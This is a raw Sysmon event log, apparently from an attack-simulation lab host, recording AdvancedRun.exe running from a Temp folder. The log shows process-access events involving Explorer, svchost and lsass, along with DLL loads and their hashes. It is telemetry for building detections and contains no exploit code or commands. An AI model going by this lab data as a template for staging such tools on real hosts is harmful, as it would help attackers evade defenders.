17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285468C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285468C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285468C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285468C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003955099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.144{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.144{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.065{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.065{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.065{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.065{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003955093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003955092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003955091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003955090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003955089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft 